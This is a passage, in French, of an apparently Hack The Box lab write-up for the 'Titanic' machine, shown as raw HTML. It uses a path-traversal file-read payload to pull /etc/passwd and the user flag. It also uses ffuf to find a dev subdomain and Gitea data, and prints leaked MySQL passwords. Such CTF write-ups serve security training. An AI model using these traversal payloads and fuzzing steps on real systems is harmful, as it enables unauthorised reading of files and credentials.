class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /download?ticket<span class="o">=</span>../../../../../../../../etc/passwd HTTP/1.1 </span></span><span class="line"><span class="cl">Host: titanic.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Date: Wed, <span class="m">19</span> Feb <span class="m">2025</span> 12:47:55 GMT </span></span><span class="line"><span class="cl">Server: Werkzeug/3.0.3 Python/3.10.12 </span></span><span class="line"><span class="cl">Content-Disposition: attachment<span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;../../../../../../../../etc/passwd&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: application/octet-stream </span></span><span class="line"><span class="cl">Content-Length: <span class="m">1951</span> </span></span><span class="line"><span class="cl">Last-Modified: Fri, <span class="m">07</span> Feb <span class="m">2025</span> 11:16:19 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-cache </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;1738926979.4294043-1951-2222001821&#34;</span> </span></span><span class="line"><span class="cl">Keep-Alive: <span class="nv">timeout</span><span class="o">=</span>5, <span class="nv">max</span><span class="o">=</span><span class="m">100</span> </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">messagebus:x:103:104::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">pollinate:x:105:1::/var/cache/pollinate:/bin/false </span></span><span class="line"><span class="cl">sshd:x:106:65534::/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">syslog:x:107:113::/home/syslog:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false </span></span><span class="line"><span class="cl">landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin </span></span><span class="line"><span class="cl">fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin </span></span><span class="line"><span class="cl">developer:x:1000:1000:developer:/home/developer:/bin/bash </span></span><span class="line"><span class="cl">lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false </span></span><span class="line"><span class="cl">dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_laurel:x:998:998::/var/log/laurel:/bin/false </span></span></code></pre></td></tr></table> </div> </div><p>Grâce à /etc/passwd on repère l&rsquo;utilisateur &ldquo;developer&rdquo;. On peut récupérer le fichier user.txt avec le flag.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /download?ticket<span class="o">=</span>../../../../../../../../home/developer/user.txt HTTP/1.1 </span></span><span class="line"><span class="cl">Host: titanic.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Date: Wed, <span class="m">19</span> Feb <span class="m">2025</span> 12:48:04 GMT </span></span><span class="line"><span class="cl">Server: Werkzeug/3.0.3 Python/3.10.12 </span></span><span class="line"><span class="cl">Content-Disposition: attachment<span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;../../../../../../../../home/developer/user.txt&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl">Content-Length: <span class="m">33</span> </span></span><span class="line"><span class="cl">Last-Modified: Wed, <span class="m">19</span> Feb <span class="m">2025</span> 12:36:23 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-cache </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;1739968583.7440214-33-1704137658&#34;</span> </span></span><span class="line"><span class="cl">Keep-Alive: <span class="nv">timeout</span><span class="o">=</span>5, <span class="nv">max</span><span class="o">=</span><span class="m">100</span> </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">fc0c.....550f </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;VirtualHost *:80&gt; </span></span><span class="line"><span class="cl"> ServerName titanic.htb </span></span><span class="line"><span class="cl"> DocumentRoot /var/www/html </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> &lt;Directory /var/www/html&gt; </span></span><span class="line"><span class="cl"> Options Indexes FollowSymLinks </span></span><span class="line"><span class="cl"> AllowOverride All </span></span><span class="line"><span class="cl"> Require all granted </span></span><span class="line"><span class="cl"> &lt;/Directory&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ProxyRequests Off </span></span><span class="line"><span class="cl"> ProxyPass / http://127.0.0.1:5000/ </span></span><span class="line"><span class="cl"> ProxyPassReverse / http://127.0.0.1:5000/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ErrorLog <span class="si">${</span><span class="nv">APACHE_LOG_DIR</span><span class="si">}</span>/error.log </span></span><span class="line"><span class="cl"> CustomLog <span class="si">${</span><span class="nv">APACHE_LOG_DIR</span><span class="si">}</span>/access.log combined </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> RewriteEngine On </span></span><span class="line"><span class="cl"> RewriteCond %<span class="o">{</span>HTTP_HOST<span class="o">}</span> !^titanic.htb$ </span></span><span class="line"><span class="cl"> RewriteRule ^<span class="o">(</span>.*<span class="o">)</span>$ http://titanic.htb<span class="nv">$1</span> <span class="o">[</span><span class="nv">R</span><span class="o">=</span>permanent,L<span class="o">]</span> </span></span><span class="line"><span class="cl">&lt;/VirtualHost&gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="dev-subdomain--devtitanichtb">dev subdomain : dev.titanic.htb </h3><p>En utilisant ffuf, on trouve un subdomain &ldquo;dev&rdquo;. On aurait pu y penser autrement, en effet l&rsquo;utilisateur trouvé précédemment était &ldquo;developer&rdquo;. En vérité, j&rsquo;ai trouvé cela en regarder la fichier /etc/hosts grâce à la LFI trouvé précedemment:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">127.0.0.1 localhost titanic.htb dev.titanic.htb </span></span><span class="line"><span class="cl">127.0.1.1 titanic </span></span></code></pre></td></tr></table> </div> </div><p>ATTENTION !! Le piège : on ne trouve rien avec <code>gobuster dns</code>. A l&rsquo;avenir, il faut prioriser ABSOLUMENT <code>ffuf</code> pour trouver les sous-domaines !!</p> <p>Cette commande ne trouve rien :</p> <blockquote> <p>gobuster dns -d titanic.htb -w /usr/share/wordlists/dirb/common.txt</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Titanic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://titanic.htb/ -H <span class="s2">&#34;Host: FUZZ.titanic.htb&#34;</span> -mc <span class="m">200</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://titanic.htb/ </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt </span></span><span class="line"><span class="cl"> :: Header : Host: FUZZ.titanic.htb </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: <span class="m">200</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">dev <span class="o">[</span>Status: 200, Size: 13983, Words: 1107, Lines: 276, Duration: 135ms<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="gitea">Gitea </h3><p><strong>dev.titanic.htb</strong> redirige vers une page <strong>Gitea</strong>.</p> <h3 id="mysql-password">Mysql password </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">version: <span class="s1">&#39;3.8&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">services: </span></span><span class="line"><span class="cl"> mysql: </span></span><span class="line"><span class="cl"> image: mysql:8.0 </span></span><span class="line"><span class="cl"> container_name: mysql </span></span><span class="line"><span class="cl"> ports: </span></span><span class="line"><span class="cl"> - <span class="s2">&#34;127.0.0.1:3306:3306&#34;</span> </span></span><span class="line"><span class="cl"> environment: </span></span><span class="line"><span class="cl"> MYSQL_ROOT_PASSWORD: <span class="s1">&#39;MySQLP@$$w0rd!&#39;</span> </span></span><span class="line"><span class="cl"> MYSQL_DATABASE: tickets </span></span><span class="line"><span class="cl"> MYSQL_USER: sql_svc </span></span><span class="line"><span class="cl"> MYSQL_PASSWORD: sql_password </span></span><span class="line"><span class="cl"> restart: always </span></span></code></pre></td></tr></table> </div> </div><h3 id="fuzzing-with-ffuf">Fuzzing with ffuf </h3><p>En faisant du fuzzing avec des plusieurs wordlists, on finit par trouver le fichier <strong>app.ini</strong> et surtout le working directory de gitea. Sur l&rsquo;interface web de gitea on avait trouvé l&rsquo;info le dossier : /home/developer/gitea/data</p> <p>Mais il m&rsquo;a fallu beaucoup de temps/fuzzing pour trouver qu&rsquo;il fallait à nouveau écrire gitea&hellip;</p> <p>J&rsquo;ai utilisé la LFI, sous forme d&rsquo;une requete &ldquo;.req&rdquo; récupérer sur BURP. Je mettais le mot &ldquo;FUZZ&rdquo; au bonne endroit dans la requete, donc apres le dossier data au début.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /download?ticket<span class="o">=</span>/home/developer/gitea/data/FUZZ HTTP/1.1 </span></span><span class="line"><span class="cl">Host: titanic.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Referer: http://titanic.htb/ </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span></code></pre></td></tr></table> </div> </div><p>Voici l&rsquo;execution de ffuf ensuite en utilisant notre requete et une liste de mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Titanic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ffuf -request download.req -request-proto http -t <span class="m">64</span> -w ./gitea_wordlist.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="s1">&#39;___\ </span></span></span><span class="line"><span class="cl"><span class="s1"> /\ \__/ /\ \__/ __ __ /\ \__/ </span></span></span><span class="line"><span class="cl"><span class="s1"> \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ </span></span></span><span class="line"><span class="cl"><span class="s1"> \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ </span></span></span><span class="line"><span class="cl"><span class="s1"> \ \_\ \ \_\ \ \____/ \ \_\ </span></span></span><span class="line"><span class="cl"><span class="s1"> \/_/ \/_/ \/___/ \/_/ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> v2.1.0-dev </span></span></span><span class="line"><span class="cl"><span class="s1">________________________________________________ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Method : GET </span></span></span><span class="line"><span class="cl"><span class="s1"> :: URL : http://titanic.htb/download?ticket=/home/developer/gitea/data/FUZZ </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Wordlist : FUZZ: /home/kali/htb/Titanic/gitea_wordlist.txt </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Connection: keep-alive </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Upgrade-Insecure-Requests: 1 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Priority: u=0, i </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Host: titanic.htb </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Accept-Language: en-US,en;q=0.5 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Header : Accept-Encoding: gzip, deflate, br </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Follow redirects : false </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Calibration : false </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Timeout : 10 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Threads : 64 </span></span></span><span class="line"><span class="cl"><span class="s1"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span></span><span class="line"><span class="cl"><span class="s1">________________________________________________ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">gitea [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 139ms] </span></span></span><span class="line"><span class="cl"><span class="s1">:: Progress: [2876/2876] :: Job [1/1] :: 404 req/sec :: Duration: [0:00:06] :: Errors: 0 :: </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">-----------on rajoute &#34;/gitea/FUZZ&#34; dans le fichier .req et on recommence la recherche---------------- </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">┌──(kali㉿kali)-[~/htb/Titanic] </span></span></span><span class="line"><span class="cl"><span class="s1">└─$ ffuf -request download.req -request-proto http -t 64 -w /usr/share/wordlists/dirb/common.txt </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> /&#39;</span>___<span class="se">\ </span> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://titanic.htb/download?ticket<span class="o">=</span>/home/developer/gitea/data/gitea/FUZZ </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> :: Header : Host: titanic.htb </span></span><span class="line"><span class="cl"> :: Header : User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> :: Header : Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl"> :: Header : Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl"> :: Header : Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl"> :: Header : Connection: keep-alive 